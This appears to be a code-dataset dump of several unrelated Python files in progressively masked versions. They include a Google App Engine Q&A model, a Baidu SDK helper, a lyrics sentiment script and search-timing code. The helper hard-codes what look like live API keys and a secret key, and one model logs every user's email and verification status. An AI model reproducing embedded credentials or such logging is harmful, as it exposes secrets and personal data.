'last_modified': self.last_modified.strftime(time_fmt)}
return d
def link(self):
qid = self.key().id()
href_link = "/q/question/%s"%str(qid)
return href_link
|
normal
|
{
"blob_id": "0b2bc19aea9393562f79df026bc17513e25c6604",
"index": 8535,
"step-1": "<mask token>\n\n\nclass User(db.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @classmethod\n def all_data(cls):\n all_data = db.GqlQuery('SELECT *FROM User')\n return list(all_data)\n\n @classmethod\n def set_email(cls, id, email):\n user = User.get_by_key_name(id)\n penn_id = email.split('@')[0]\n user.email = email\n user.penn_id = penn_id\n user.put()\n\n @classmethod\n def is_email_verified(cls, email):\n data = User.all_data()\n if data is not None:\n all_emails = {user.email: user.email_verified for user in data}\n logging.info('all email information ' + str(all_emails))\n return all_emails.get(email, False)\n\n @classmethod\n def is_pennid_verified(cls, email):\n penn_id = email.split('@')[0]\n all_data = User.all_data()\n if all_data is not None:\n all_penn_ids = {user.penn_id: user.email_verified for user in\n all_data}\n logging.info('all penn id information' + str(all_penn_ids))\n return all_penn_ids.get(penn_id, False)\n\n\nclass Answer(db.Model):\n answer = db.TextProperty(required=True)\n answered_by = db.StringProperty(required=True)\n answerer_name = db.StringProperty(required=True)\n upvoted_by = db.ListProperty(str)\n\n def get_votes(self):\n return len(self.upvoted_by)\n\n def get_upvote_link(self):\n return '/q/question/upvote/%s' % self.key().id()\n\n\n<mask token>\n\n\nclass Question(db.Model):\n question = db.TextProperty(required=True)\n created = db.DateTimeProperty(auto_now_add=True)\n last_modified = db.DateTimeProperty(auto_now=True)\n answers = db.ListProperty(item_type=db.Key, required=True)\n asked_by = db.StringProperty(required=True)\n asker_name = db.StringProperty(required=True)\n\n def render(self):\n self._render_text = self.question.replace('\\n', '<br>')\n return render_str('question.html', q=self)\n\n def as_dict(self):\n time_fmt = '%c'\n d = {'question': self.question, 'created': self.created.strftime(\n time_fmt), 'last_modified': self.last_modified.strftime(time_fmt)}\n return d\n\n def link(self):\n qid = self.key().id()\n href_link = '/q/question/%s' % str(qid)\n return href_link\n",
"step-2": "<mask token>\n\n\nclass User(db.Model):\n id = db.StringProperty(required=True)\n created = db.DateTimeProperty(auto_now_add=True)\n updated = db.DateTimeProperty(auto_now=True)\n name = db.StringProperty(required=True)\n profile_url = db.StringProperty(required=True)\n access_token = db.StringProperty(required=True)\n email = db.StringProperty(required=False)\n penn_id = db.StringProperty(required=False)\n email_verified = db.BooleanProperty(required=True)\n verification_code = db.StringProperty(required=True)\n chair = db.StringProperty(required=False)\n vicechair = db.StringProperty(required=False)\n treasurer = db.StringProperty(required=False)\n socialchair = db.StringProperty(required=False)\n operationschair = db.StringProperty(required=False)\n gapsaliason = db.StringProperty(required=False)\n communicationschair = db.StringProperty(required=False)\n webadmin = db.StringProperty(required=False)\n marketingchair = db.StringProperty(required=False)\n chair_count = db.IntegerProperty(required=False, default=0)\n vicechair_count = db.IntegerProperty(required=False, default=0)\n treasurer_count = db.IntegerProperty(required=False, default=0)\n socialchair_count = db.IntegerProperty(required=False, default=0)\n operationschair_count = db.IntegerProperty(required=False, default=0)\n gapsaliason_count = db.IntegerProperty(required=False, default=0)\n communicationschair_count = db.IntegerProperty(required=False, default=0)\n webadmin_count = db.IntegerProperty(required=False, default=0)\n marketingchair_count = db.IntegerProperty(required=False, default=0)\n\n @classmethod\n def all_data(cls):\n all_data = db.GqlQuery('SELECT *FROM User')\n return list(all_data)\n\n @classmethod\n def set_email(cls, id, email):\n user = User.get_by_key_name(id)\n penn_id = email.split('@')[0]\n user.email = email\n user.penn_id = penn_id\n user.put()\n\n @classmethod\n def is_email_verified(cls, email):\n data = User.all_data()\n if data is not None:\n all_emails = {user.email: user.email_verified for user in data}\n logging.info('all email information ' + str(all_emails))\n return all_emails.get(email, False)\n\n @classmethod\n def is_pennid_verified(cls, email):\n penn_id = email.split('@')[0]\n all_data = User.all_data()\n if all_data is not None:\n all_penn_ids = {user.penn_id: user.email_verified for user in\n all_data}\n logging.info('all penn id information' + str(all_penn_ids))\n return all_penn_ids.get(penn_id, False)\n\n\nclass Answer(db.Model):\n answer = db.TextProperty(required=True)\n answered_by = db.StringProperty(required=True)\n answerer_name = db.StringProperty(required=True)\n upvoted_by = db.ListProperty(str)\n\n def get_votes(self):\n return len(self.upvoted_by)\n\n def get_upvote_link(self):\n return '/q/question/upvote/%s' % self.key().id()\n\n\n<mask token>\n\n\nclass Question(db.Model):\n question = db.TextProperty(required=True)\n created = db.DateTimeProperty(auto_now_add=True)\n last_modified = db.DateTimeProperty(auto_now=True)\n answers = db.ListProperty(item_type=db.Key, required=True)\n asked_by = db.StringProperty(required=True)\n asker_name = db.StringProperty(required=True)\n\n def render(self):\n self._render_text = self.question.replace('\\n', '<br>')\n return render_str('question.html', q=self)\n\n def as_dict(self):\n time_fmt = '%c'\n d = {'question': self.question, 'created': self.created.strftime(\n time_fmt), 'last_modified': self.last_modified.strftime(time_fmt)}\n return d\n\n def link(self):\n qid = self.key().id()\n href_link = '/q/question/%s' % str(qid)\n return href_link\n",
"step-3": "<mask token>\n\n\nclass User(db.Model):\n id = db.StringProperty(required=True)\n created = db.DateTimeProperty(auto_now_add=True)\n updated = db.DateTimeProperty(auto_now=True)\n name = db.StringProperty(required=True)\n profile_url = db.StringProperty(required=True)\n access_token = db.StringProperty(required=True)\n email = db.StringProperty(required=False)\n penn_id = db.StringProperty(required=False)\n email_verified = db.BooleanProperty(required=True)\n verification_code = db.StringProperty(required=True)\n chair = db.StringProperty(required=False)\n vicechair = db.StringProperty(required=False)\n treasurer = db.StringProperty(required=False)\n socialchair = db.StringProperty(required=False)\n operationschair = db.StringProperty(required=False)\n gapsaliason = db.StringProperty(required=False)\n communicationschair = db.StringProperty(required=False)\n webadmin = db.StringProperty(required=False)\n marketingchair = db.StringProperty(required=False)\n chair_count = db.IntegerProperty(required=False, default=0)\n vicechair_count = db.IntegerProperty(required=False, default=0)\n treasurer_count = db.IntegerProperty(required=False, default=0)\n socialchair_count = db.IntegerProperty(required=False, default=0)\n operationschair_count = db.IntegerProperty(required=False, default=0)\n gapsaliason_count = db.IntegerProperty(required=False, default=0)\n communicationschair_count = db.IntegerProperty(required=False, default=0)\n webadmin_count = db.IntegerProperty(required=False, default=0)\n marketingchair_count = db.IntegerProperty(required=False, default=0)\n\n @classmethod\n def all_data(cls):\n all_data = db.GqlQuery('SELECT *FROM User')\n return list(all_data)\n\n @classmethod\n def set_email(cls, id, email):\n user = User.get_by_key_name(id)\n penn_id = email.split('@')[0]\n user.email = email\n user.penn_id = penn_id\n user.put()\n\n @classmethod\n def is_email_verified(cls, email):\n data = User.all_data()\n if data is not None:\n all_emails = {user.email: user.email_verified for user in data}\n logging.info('all email information ' + str(all_emails))\n return all_emails.get(email, False)\n\n @classmethod\n def is_pennid_verified(cls, email):\n penn_id = email.split('@')[0]\n all_data = User.all_data()\n if all_data is not None:\n all_penn_ids = {user.penn_id: user.email_verified for user in\n all_data}\n logging.info('all penn id information' + str(all_penn_ids))\n return all_penn_ids.get(penn_id, False)\n\n\nclass Answer(db.Model):\n answer = db.TextProperty(required=True)\n answered_by = db.StringProperty(required=True)\n answerer_name = db.StringProperty(required=True)\n upvoted_by = db.ListProperty(str)\n\n def get_votes(self):\n return len(self.upvoted_by)\n\n def get_upvote_link(self):\n return '/q/question/upvote/%s' % self.key().id()\n\n\ndef render_str(template, **params):\n template_dir = os.path.join(os.path.dirname(__file__), 'templates')\n jinja_environment = jinja2.Environment(loader=jinja2.FileSystemLoader(\n template_dir), autoescape=True)\n t = jinja_environment.get_template(template)\n return t.render(params)\n\n\nclass Question(db.Model):\n question = db.TextProperty(required=True)\n created = db.DateTimeProperty(auto_now_add=True)\n last_modified = db.DateTimeProperty(auto_now=True)\n answers = db.ListProperty(item_type=db.Key, required=True)\n asked_by = db.StringProperty(required=True)\n asker_name = db.StringProperty(required=True)\n\n def render(self):\n self._render_text = self.question.replace('\\n', '<br>')\n return render_str('question.html', q=self)\n\n def as_dict(self):\n time_fmt = '%c'\n d = {'question': self.question, 'created': self.created.strftime(\n time_fmt), 'last_modified': self.last_modified.strftime(time_fmt)}\n return d\n\n def link(self):\n qid = self.key().id()\n href_link = '/q/question/%s' % str(qid)\n return href_link\n",
"step-4": "__author__ = 'Chitrang'\n<mask token>\n\n\nclass User(db.Model):\n id = db.StringProperty(required=True)\n created = db.DateTimeProperty(auto_now_add=True)\n updated = db.DateTimeProperty(auto_now=True)\n name = db.StringProperty(required=True)\n profile_url = db.StringProperty(required=True)\n access_token = db.StringProperty(required=True)\n email = db.StringProperty(required=False)\n penn_id = db.StringProperty(required=False)\n email_verified = db.BooleanProperty(required=True)\n verification_code = db.StringProperty(required=True)\n chair = db.StringProperty(required=False)\n vicechair = db.StringProperty(required=False)\n treasurer = db.StringProperty(required=False)\n socialchair = db.StringProperty(required=False)\n operationschair = db.StringProperty(required=False)\n gapsaliason = db.StringProperty(required=False)\n communicationschair = db.StringProperty(required=False)\n webadmin = db.StringProperty(required=False)\n marketingchair = db.StringProperty(required=False)\n chair_count = db.IntegerProperty(required=False, default=0)\n vicechair_count = db.IntegerProperty(required=False, default=0)\n treasurer_count = db.IntegerProperty(required=False, default=0)\n socialchair_count = db.IntegerProperty(required=False, default=0)\n operationschair_count = db.IntegerProperty(required=False, default=0)\n gapsaliason_count = db.IntegerProperty(required=False, default=0)\n communicationschair_count = db.IntegerProperty(required=False, default=0)\n webadmin_count = db.IntegerProperty(required=False, default=0)\n marketingchair_count = db.IntegerProperty(required=False, default=0)\n\n @classmethod\n def all_data(cls):\n all_data = db.GqlQuery('SELECT *FROM User')\n return list(all_data)\n\n @classmethod\n def set_email(cls, id, email):\n user = User.get_by_key_name(id)\n penn_id = email.split('@')[0]\n user.email = email\n user.penn_id = penn_id\n user.put()\n\n @classmethod\n def is_email_verified(cls, email):\n data = User.all_data()\n if data is not None:\n all_emails = {user.email: user.email_verified for user in data}\n logging.info('all email information ' + str(all_emails))\n return all_emails.get(email, False)\n\n @classmethod\n def is_pennid_verified(cls, email):\n penn_id = email.split('@')[0]\n all_data = User.all_data()\n if all_data is not None:\n all_penn_ids = {user.penn_id: user.email_verified for user in\n all_data}\n logging.info('all penn id information' + str(all_penn_ids))\n return all_penn_ids.get(penn_id, False)\n\n\nclass Answer(db.Model):\n answer = db.TextProperty(required=True)\n answered_by = db.StringProperty(required=True)\n answerer_name = db.StringProperty(required=True)\n upvoted_by = db.ListProperty(str)\n\n def get_votes(self):\n return len(self.upvoted_by)\n\n def get_upvote_link(self):\n return '/q/question/upvote/%s' % self.key().id()\n\n\ndef render_str(template, **params):\n template_dir = os.path.join(os.path.dirname(__file__), 'templates')\n jinja_environment = jinja2.Environment(loader=jinja2.FileSystemLoader(\n template_dir), autoescape=True)\n t = jinja_environment.get_template(template)\n return t.render(params)\n\n\nclass Question(db.Model):\n question = db.TextProperty(required=True)\n created = db.DateTimeProperty(auto_now_add=True)\n last_modified = db.DateTimeProperty(auto_now=True)\n answers = db.ListProperty(item_type=db.Key, required=True)\n asked_by = db.StringProperty(required=True)\n asker_name = db.StringProperty(required=True)\n\n def render(self):\n self._render_text = self.question.replace('\\n', '<br>')\n return render_str('question.html', q=self)\n\n def as_dict(self):\n time_fmt = '%c'\n d = {'question': self.question, 'created': self.created.strftime(\n time_fmt), 'last_modified': self.last_modified.strftime(time_fmt)}\n return d\n\n def link(self):\n qid = self.key().id()\n href_link = '/q/question/%s' % str(qid)\n return href_link\n",
"step-5": "__author__ = 'Chitrang'\n\nfrom google.appengine.api import memcache\nfrom google.appengine.ext import db\nimport logging\nimport os\nimport jinja2\n\nclass User(db.Model):\n\n id = db.StringProperty(required=True)\n created = db.DateTimeProperty(auto_now_add=True)\n updated = db.DateTimeProperty(auto_now=True)\n name = db.StringProperty(required=True)\n profile_url = db.StringProperty(required=True)\n access_token = db.StringProperty(required=True)\n email = db.StringProperty(required=False)\n penn_id = db.StringProperty(required=False)\n email_verified = db.BooleanProperty(required=True)\n verification_code = db.StringProperty(required=True)\n\n #posts\n chair = db.StringProperty(required=False)\n vicechair = db.StringProperty(required=False)\n treasurer = db.StringProperty(required=False)\n socialchair = db.StringProperty(required=False)\n operationschair = db.StringProperty(required=False)\n gapsaliason = db.StringProperty(required=False)\n communicationschair = db.StringProperty(required=False)\n webadmin = db.StringProperty(required=False)\n marketingchair = db.StringProperty(required=False)\n\n #counts\n chair_count = db.IntegerProperty(required=False, default=0)\n vicechair_count = db.IntegerProperty(required=False, default=0)\n treasurer_count = db.IntegerProperty(required=False, default=0)\n socialchair_count = db.IntegerProperty(required=False, default=0)\n operationschair_count = db.IntegerProperty(required=False, default=0)\n gapsaliason_count = db.IntegerProperty(required=False, default=0)\n communicationschair_count = db.IntegerProperty(required=False, default=0)\n webadmin_count = db.IntegerProperty(required=False, default=0)\n marketingchair_count = db.IntegerProperty(required=False, default=0)\n\n @classmethod\n def all_data(cls):\n all_data = db.GqlQuery(\"SELECT *\"\n \"FROM User\")\n return list(all_data)\n #logging.info(\"updating cache\")\n #memcache.set('users', list(all_data))\n\n @classmethod\n def set_email(cls, id, email):\n user = User.get_by_key_name(id)\n penn_id = email.split(\"@\")[0]\n user.email = email\n user.penn_id = penn_id\n user.put()\n #User.update_cache()\n\n @classmethod\n def is_email_verified(cls, email):\n data = User.all_data()\n if data is not None:\n all_emails = {user.email : user.email_verified for user in data}\n logging.info(\"all email information \"+ str(all_emails))\n return all_emails.get(email, False)\n\n @classmethod\n def is_pennid_verified(cls, email):\n penn_id = email.split(\"@\")[0]\n all_data = User.all_data()\n if all_data is not None:\n all_penn_ids = {user.penn_id: user.email_verified for user in all_data}\n logging.info(\"all penn id information\" + str(all_penn_ids))\n return all_penn_ids.get(penn_id, False)\n\n\n\nclass Answer(db.Model):\n answer = db.TextProperty(required=True)\n answered_by = db.StringProperty(required=True)\n answerer_name = db.StringProperty(required=True)\n upvoted_by = db.ListProperty(str)\n\n def get_votes(self):\n return len(self.upvoted_by)\n\n def get_upvote_link(self):\n return \"/q/question/upvote/%s\"%self.key().id()\n\ndef render_str(template, **params):\n template_dir = os.path.join(os.path.dirname(__file__), 'templates')\n jinja_environment = jinja2.Environment(loader = jinja2.FileSystemLoader(template_dir),\n autoescape = True)\n t = jinja_environment.get_template(template)\n return t.render(params)\n\n\nclass Question(db.Model):\n question = db.TextProperty(required = True)\n created = db.DateTimeProperty(auto_now_add = True)\n last_modified = db.DateTimeProperty(auto_now = True)\n answers = db.ListProperty(item_type=db.Key,required=True)\n asked_by = db.StringProperty(required=True)\n asker_name = db.StringProperty(required=True)\n\n\n def render(self):\n self._render_text = self.question.replace('\\n', '<br>')\n return render_str(\"question.html\", q = self)\n\n def as_dict(self):\n time_fmt = '%c'\n d = {'question': self.question,\n 'created': self.created.strftime(time_fmt),\n 'last_modified': self.last_modified.strftime(time_fmt)}\n return d\n\n def link(self):\n qid = self.key().id()\n href_link = \"/q/question/%s\"%str(qid)\n return href_link\n\n",
"step-ids": [
14,
15,
16,
17,
19
]
}
|
[
14,
15,
16,
17,
19
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
i = 1
<|reserved_special_token_1|>
# i change it for change1
# change 1.py in master
i = 1
# fix bug for boss
|
flexible
|
{
"blob_id": "92f4f1c8a4e04b07ed7c05d5bb733c0b9c28bd05",
"index": 5325,
"step-1": "<mask token>\n",
"step-2": "i = 1\n",
"step-3": "# i change it for change1\n# change 1.py in master\ni = 1\n# fix bug for boss\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def print_json(obj):
"""json格式打印信息
Args:
obj 待打印的对象信息
"""
print(json.dumps(obj, ensure_ascii=False))
def print_error(err_code, err_msg):
"""格式化打印错误信息
Args:
err_code: 错误码
err_msg: 错误信息
"""
print(u'[{0}]: {1}'.format(err_code, err_msg))
def get_image_base64_content(image_file):
"""获取图片base64编码信息
Args:
image_file: 图片
Returns:
base64编码的图片信息
"""
with open(image_file, 'rb') as fp:
return str(base64.b64encode(fp.read()), 'utf-8')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
APP_ID = '10676432'
API_KEY = 'Hy1D1urUTdXzTOzqr9LeN3gc'
SECRET_KEY = 'foS4GMg2w3QZtO9XNoSQF17Kkk007xWk'
def print_json(obj):
"""json格式打印信息
Args:
obj 待打印的对象信息
"""
print(json.dumps(obj, ensure_ascii=False))
def print_error(err_code, err_msg):
"""格式化打印错误信息
Args:
err_code: 错误码
err_msg: 错误信息
"""
print(u'[{0}]: {1}'.format(err_code, err_msg))
def get_image_base64_content(image_file):
"""获取图片base64编码信息
Args:
image_file: 图片
Returns:
base64编码的图片信息
"""
with open(image_file, 'rb') as fp:
return str(base64.b64encode(fp.read()), 'utf-8')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import json
import base64
APP_ID = '10676432'
API_KEY = 'Hy1D1urUTdXzTOzqr9LeN3gc'
SECRET_KEY = 'foS4GMg2w3QZtO9XNoSQF17Kkk007xWk'
def print_json(obj):
"""json格式打印信息
Args:
obj 待打印的对象信息
"""
print(json.dumps(obj, ensure_ascii=False))
def print_error(err_code, err_msg):
"""格式化打印错误信息
Args:
err_code: 错误码
err_msg: 错误信息
"""
print(u'[{0}]: {1}'.format(err_code, err_msg))
def get_image_base64_content(image_file):
"""获取图片base64编码信息
Args:
image_file: 图片
Returns:
base64编码的图片信息
"""
with open(image_file, 'rb') as fp:
return str(base64.b64encode(fp.read()), 'utf-8')
<|reserved_special_token_1|>
#coding=utf-8
#
"""
my custom common module
"""
import json
import base64
# sdk账号信息
APP_ID = '10676432'
API_KEY = 'Hy1D1urUTdXzTOzqr9LeN3gc'
SECRET_KEY = 'foS4GMg2w3QZtO9XNoSQF17Kkk007xWk'
def print_json(obj):
"""json格式打印信息
Args:
obj 待打印的对象信息
"""
print(json.dumps(obj, ensure_ascii=False))
def print_error(err_code, err_msg):
"""格式化打印错误信息
Args:
err_code: 错误码
err_msg: 错误信息
"""
print(u"[{0}]: {1}".format(err_code, err_msg))
def get_image_base64_content(image_file):
"""获取图片base64编码信息
Args:
image_file: 图片
Returns:
base64编码的图片信息
"""
with open(image_file, 'rb') as fp:
return str(base64.b64encode(fp.read()), 'utf-8')
|
flexible
|
{
"blob_id": "0b0eebd31d822ff5c1b951c3ee213f58a3a13aa0",
"index": 134,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef print_json(obj):\n \"\"\"json格式打印信息\n\n Args:\n obj 待打印的对象信息\n \"\"\"\n print(json.dumps(obj, ensure_ascii=False))\n\n\ndef print_error(err_code, err_msg):\n \"\"\"格式化打印错误信息\n\n Args:\n err_code: 错误码\n err_msg: 错误信息\n \"\"\"\n print(u'[{0}]: {1}'.format(err_code, err_msg))\n\n\ndef get_image_base64_content(image_file):\n \"\"\"获取图片base64编码信息\n\n Args:\n image_file: 图片\n\n Returns:\n base64编码的图片信息\n \"\"\"\n with open(image_file, 'rb') as fp:\n return str(base64.b64encode(fp.read()), 'utf-8')\n",
"step-3": "<mask token>\nAPP_ID = '10676432'\nAPI_KEY = 'Hy1D1urUTdXzTOzqr9LeN3gc'\nSECRET_KEY = 'foS4GMg2w3QZtO9XNoSQF17Kkk007xWk'\n\n\ndef print_json(obj):\n \"\"\"json格式打印信息\n\n Args:\n obj 待打印的对象信息\n \"\"\"\n print(json.dumps(obj, ensure_ascii=False))\n\n\ndef print_error(err_code, err_msg):\n \"\"\"格式化打印错误信息\n\n Args:\n err_code: 错误码\n err_msg: 错误信息\n \"\"\"\n print(u'[{0}]: {1}'.format(err_code, err_msg))\n\n\ndef get_image_base64_content(image_file):\n \"\"\"获取图片base64编码信息\n\n Args:\n image_file: 图片\n\n Returns:\n base64编码的图片信息\n \"\"\"\n with open(image_file, 'rb') as fp:\n return str(base64.b64encode(fp.read()), 'utf-8')\n",
"step-4": "<mask token>\nimport json\nimport base64\nAPP_ID = '10676432'\nAPI_KEY = 'Hy1D1urUTdXzTOzqr9LeN3gc'\nSECRET_KEY = 'foS4GMg2w3QZtO9XNoSQF17Kkk007xWk'\n\n\ndef print_json(obj):\n \"\"\"json格式打印信息\n\n Args:\n obj 待打印的对象信息\n \"\"\"\n print(json.dumps(obj, ensure_ascii=False))\n\n\ndef print_error(err_code, err_msg):\n \"\"\"格式化打印错误信息\n\n Args:\n err_code: 错误码\n err_msg: 错误信息\n \"\"\"\n print(u'[{0}]: {1}'.format(err_code, err_msg))\n\n\ndef get_image_base64_content(image_file):\n \"\"\"获取图片base64编码信息\n\n Args:\n image_file: 图片\n\n Returns:\n base64编码的图片信息\n \"\"\"\n with open(image_file, 'rb') as fp:\n return str(base64.b64encode(fp.read()), 'utf-8')\n",
"step-5": "#coding=utf-8\n#\n\"\"\"\nmy custom common module\n\"\"\"\nimport json\nimport base64\n\n# sdk账号信息\nAPP_ID = '10676432'\nAPI_KEY = 'Hy1D1urUTdXzTOzqr9LeN3gc'\nSECRET_KEY = 'foS4GMg2w3QZtO9XNoSQF17Kkk007xWk'\n\n\ndef print_json(obj):\n \"\"\"json格式打印信息\n\n Args:\n obj 待打印的对象信息\n \"\"\"\n print(json.dumps(obj, ensure_ascii=False))\n\n\ndef print_error(err_code, err_msg):\n \"\"\"格式化打印错误信息\n\n Args:\n err_code: 错误码\n err_msg: 错误信息\n \"\"\"\n print(u\"[{0}]: {1}\".format(err_code, err_msg))\n\n\ndef get_image_base64_content(image_file):\n \"\"\"获取图片base64编码信息\n\n Args:\n image_file: 图片\n\n Returns:\n base64编码的图片信息\n \"\"\"\n with open(image_file, 'rb') as fp:\n return str(base64.b64encode(fp.read()), 'utf-8')\n\n",
"step-ids": [
0,
3,
4,
5,
6
]
}
|
[
0,
3,
4,
5,
6
] |
from pull_links import pull_links
from scrape_lyrics import scrape_lyrics
from vader_sentiment import getSentimentScores
import sys
import os
import shutil
# Get user input for artist -> capitalize it
artist = sys.argv[1].title()
pull_links(artist)
# Dictionary w/ song name as key and lyrics as value
lyrics = scrape_lyrics('links.json')
os.remove('./links.json')
shutil.rmtree('./songs')
# Dictionary w/ song name as key and sentiment data as value
sentimentScores = getSentimentScores(lyrics)
# Print out sentimentScores
for song in sentimentScores:
print(song + ': ')
print(sentimentScores[song])
|
normal
|
{
"blob_id": "5055743c9ed8c92bcfab5379162f28315409ff91",
"index": 2200,
"step-1": "<mask token>\n",
"step-2": "<mask token>\npull_links(artist)\n<mask token>\nos.remove('./links.json')\nshutil.rmtree('./songs')\n<mask token>\nfor song in sentimentScores:\n print(song + ': ')\n print(sentimentScores[song])\n",
"step-3": "<mask token>\nartist = sys.argv[1].title()\npull_links(artist)\nlyrics = scrape_lyrics('links.json')\nos.remove('./links.json')\nshutil.rmtree('./songs')\nsentimentScores = getSentimentScores(lyrics)\nfor song in sentimentScores:\n print(song + ': ')\n print(sentimentScores[song])\n",
"step-4": "from pull_links import pull_links\nfrom scrape_lyrics import scrape_lyrics\nfrom vader_sentiment import getSentimentScores\nimport sys\nimport os\nimport shutil\nartist = sys.argv[1].title()\npull_links(artist)\nlyrics = scrape_lyrics('links.json')\nos.remove('./links.json')\nshutil.rmtree('./songs')\nsentimentScores = getSentimentScores(lyrics)\nfor song in sentimentScores:\n print(song + ': ')\n print(sentimentScores[song])\n",
"step-5": "from pull_links import pull_links\nfrom scrape_lyrics import scrape_lyrics\nfrom vader_sentiment import getSentimentScores\nimport sys\nimport os\nimport shutil\n\n# Get user input for artist -> capitalize it\nartist = sys.argv[1].title()\n\npull_links(artist)\n# Dictionary w/ song name as key and lyrics as value\nlyrics = scrape_lyrics('links.json')\nos.remove('./links.json')\nshutil.rmtree('./songs')\n# Dictionary w/ song name as key and sentiment data as value\nsentimentScores = getSentimentScores(lyrics)\n# Print out sentimentScores\nfor song in sentimentScores:\n print(song + ': ')\n print(sentimentScores[song])\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import random
import sys
def sequential_search(my_list, search_elt):
found = False
start_time = time.time()
for elt in my_list:
if search_elt == elt:
found = True
break
return (time.time() - start_time), found
def ordered_sequential_search(my_list, search_elt):
found = False
start_time = time.time()
for elt in my_list:
if search_elt == elt:
found = True
break
elif search_elt > elt:
break
return (time.time() - start_time), found
def binary_search_iterative(my_list, search_elt):
first = 0
last = len(my_list) - 1
found = False
start_time = time.time()
while first <= last and not found:
midpoint = (first + last) // 2
if my_list[midpoint] == search_elt:
found = True
elif search_elt < my_list[midpoint]:
last = midpoint - 1
else:
first = midpoint + 1
return (time.time() - start_time), found
def binary_search_rec(a_list, item):
if len(a_list) == 0:
return False
else:
midpoint = len(a_list) // 2
if a_list[midpoint] == item:
return True
elif item < a_list[midpoint]:
return binary_search_rec(a_list[:midpoint], item)
else:
return binary_search_rec(a_list[midpoint + 1:], item)
def binary_search_recursive(my_list, search_elt, start_time = time.time):
start_time = time.time()
return (time.time() - start_time), binary_search_rec(my_list, search_elt)
def generate_random_nb_my_list(nb, amount_my_list, maxNumber = sys.maxint):
return [
[random.randint(0, maxNumber) for _ in range (nb)]
for _ in range (amount_my_list)
]
def functionTimerAggregator(timeAggregator, fn, amt_of_nb, rnd_list):
(fn_name, fn_function, fn_list_indx) = fn
(timing, _) = fn_function(rnd_list[fn_list_indx], -1)
if amt_of_nb not in timeAggregator:
timeAggregator[amt_of_nb] = {}
if fn_name not in timeAggregator[amt_of_nb]:
timeAggregator[amt_of_nb][fn_name] = 0
timeAggregator[amt_of_nb][fn_name] += timing
def printTimerAggregator(timeAggregator, list_size):
for amount_of_number, fn_type in timeAggregator.iteritems():
print('For %s size of list:' % amount_of_number)
for fn_name, consumedTime in fn_type.iteritems():
print('\t%s took %10.7f seconds to run, on average'
% (fn_name, consumedTime / list_size))
if __name__ == '__main__':
timeAggregator = {}
amount_of_numbers = [500, 1000, 10000]
function_list = [
('Sequential Search', sequential_search, 0),
('Ordered Sequential Search', ordered_sequential_search, 1),
('Binary Search Iterative', binary_search_iterative, 1),
('Binary Search Recursive', binary_search_recursive, 1),
]
list_size = 100
for amount_of_number in amount_of_numbers:
my_randoms = generate_random_nb_my_list(amount_of_number, list_size)
for unsorted_list in my_randoms:
sorted_list = unsorted_list[:]
sorted_list.sort()
for fn in function_list:
functionTimerAggregator(
timeAggregator, fn, amount_of_number,
(unsorted_list, sorted_list))
printTimerAggregator(timeAggregator, list_size)
|
normal
|
{
"blob_id": "f3a34d1c37165490c77ccd21f428718c8c90f866",
"index": 4057,
"step-1": "<mask token>\n\n\ndef sequential_search(my_list, search_elt):\n found = False\n start_time = time.time()\n for elt in my_list:\n if search_elt == elt:\n found = True\n break\n return time.time() - start_time, found\n\n\ndef ordered_sequential_search(my_list, search_elt):\n found = False\n start_time = time.time()\n for elt in my_list:\n if search_elt == elt:\n found = True\n break\n elif search_elt > elt:\n break\n return time.time() - start_time, found\n\n\n<mask token>\n\n\ndef binary_search_rec(a_list, item):\n if len(a_list) == 0:\n return False\n else:\n midpoint = len(a_list) // 2\n if a_list[midpoint] == item:\n return True\n elif item < a_list[midpoint]:\n return binary_search_rec(a_list[:midpoint], item)\n else:\n return binary_search_rec(a_list[midpoint + 1:], item)\n\n\ndef binary_search_recursive(my_list, search_elt, start_time=time.time):\n start_time = time.time()\n return time.time() - start_time, binary_search_rec(my_list, search_elt)\n\n\n<mask token>\n\n\ndef functionTimerAggregator(timeAggregator, fn, amt_of_nb, rnd_list):\n fn_name, fn_function, fn_list_indx = fn\n timing, _ = fn_function(rnd_list[fn_list_indx], -1)\n if amt_of_nb not in timeAggregator:\n timeAggregator[amt_of_nb] = {}\n if fn_name not in timeAggregator[amt_of_nb]:\n timeAggregator[amt_of_nb][fn_name] = 0\n timeAggregator[amt_of_nb][fn_name] += timing\n\n\ndef printTimerAggregator(timeAggregator, list_size):\n for amount_of_number, fn_type in timeAggregator.iteritems():\n print('For %s size of list:' % amount_of_number)\n for fn_name, consumedTime in fn_type.iteritems():\n print('\\t%s took %10.7f seconds to run, on average' % (fn_name,\n consumedTime / list_size))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef sequential_search(my_list, search_elt):\n found = False\n start_time = time.time()\n for elt in my_list:\n if search_elt == elt:\n found = True\n break\n return time.time() - start_time, found\n\n\ndef ordered_sequential_search(my_list, search_elt):\n found = False\n start_time = time.time()\n for elt in my_list:\n if search_elt == elt:\n found = True\n break\n elif search_elt > elt:\n break\n return time.time() - start_time, found\n\n\ndef binary_search_iterative(my_list, search_elt):\n first = 0\n last = len(my_list) - 1\n found = False\n start_time = time.time()\n while first <= last and not found:\n midpoint = (first + last) // 2\n if my_list[midpoint] == search_elt:\n found = True\n elif search_elt < my_list[midpoint]:\n last = midpoint - 1\n else:\n first = midpoint + 1\n return time.time() - start_time, found\n\n\ndef binary_search_rec(a_list, item):\n if len(a_list) == 0:\n return False\n else:\n midpoint = len(a_list) // 2\n if a_list[midpoint] == item:\n return True\n elif item < a_list[midpoint]:\n return binary_search_rec(a_list[:midpoint], item)\n else:\n return binary_search_rec(a_list[midpoint + 1:], item)\n\n\ndef binary_search_recursive(my_list, search_elt, start_time=time.time):\n start_time = time.time()\n return time.time() - start_time, binary_search_rec(my_list, search_elt)\n\n\n<mask token>\n\n\ndef 